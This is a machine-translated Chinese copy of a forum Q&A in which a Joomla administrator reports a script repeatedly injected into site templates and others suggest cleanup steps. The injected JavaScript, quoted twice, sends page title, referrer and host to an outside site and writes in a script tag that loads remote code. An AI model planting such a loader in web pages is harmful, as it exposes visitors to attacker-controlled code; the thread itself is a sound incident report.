1. 首頁
  2. 問答
  3. 腳本注入的Joomla模板

腳本注入的Joomla模板

2016-01-12 58 views
1

我以前管理大量的Joomla網站的,和幾個月,在所有這些,開始出現一些非常strage腳本...腳本注入的Joomla模板

贊一個以上:

所以我刪除所有的人工,但他們不斷出現再次:(

有人能幫助理解發生了什麼?我應該編輯一些文件,以防止happend?

非常感謝!

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

來源

2016-01-12 Diogo Wernik

+0

你可能會給這個看看。 [鏈接](http://stackoverflow.com/questions/34720405/joomla-site-hacked/34733454#34733454) –

回答

0

所以,它有點複雜!但我發現,我的服務器被黑客入侵

服務器結構,我有:

joomlasite (folder 1) 
otherjoomlasite (folder2) 
bigjoomlasite (folder3) 
(...) 
php.ini

所以在文件夾中的public_html我發現許多像很奇怪的文件!

public_html 
joomlasite 
joomlasite.com (hacked issue - so i deleted this folder) 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
otherjoomlasite 
otherjoomlasite.org 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
bigjoomlasite (folder3) 
bigjoomlasite.io 
|____ css (lots of strange files *.php) 
|____ sylink (lots of strange files *.php) 
alias.php (strange file) 
article.php (strange file) 
css.php (strange file)

所以我刪除了所有奇怪的文件,joomla文件夾哪裏好,我沒有找到奇怪的文件呢!

做了所有安全更改,密碼等...

而在所有的Joomla模板刪除:

var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://houstonluxlife.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}

看起來像全沒了穩定的現在:)

感謝答案和sugestions ...

來源

2016-01-15 14:59:54

+0

你發現這是怎麼發生的?我正在尋找一種方法來保護我的網站免受這些攻擊。我們已經被黑客攻擊了很多次,所以我想這不是最後一次有人試圖用這些黑客攻擊你的網站 – Shide

+1

嗨@Shide,我沒有發現這是怎麼發生的,但做了一些行動,有助於預防,但並非易事,因爲我到目前爲止沒有問題,不知道未來是否會有這樣的問題。我使用的是共享主機,因此我更改爲數字海洋上的vpn機器,開始使用nginx反向代理作爲服務器,並在nginx配置文件上使用了一些腳本來防止攻擊。如果你想可以放在這裏與腳本文件的鏈接或提供更多的信息;) –

+0

非常感謝!但我們的託管服務提供商並沒有真正允許我們進入服務器深層配置。實際上我現在厭倦了joomla,所以我只是想用AWS/nginx/NodeJS開發一個新網站,那樣會很好。謝謝你的評論 ! – Shide

2

如果腳本出現在您的模板中,我假設您已被黑客入侵。嘗試在所有文件內容第一次發生之前恢復所有文件內容,並重置所有密碼。然後升級到最新的joomla版本,以防止黑客入侵。

如果您不確定何時發生了攻擊,因此無法回滾到以前的版本,請將所有代碼替換爲新下載的代碼(Joomla核心,下載的組件等)。檢查圖像文件夾來檢查它只包含圖像(沒有PHP腳本或其他可疑的文件)。如果你有自定義代碼,查看這個來檢查沒有任何東西被注入。再次重置所有密碼(ftp,用戶密碼,db密碼等)。那麼你會沒事的。

來源

2016-01-12 23:21:37 jonasfh

相關問題

 相關問題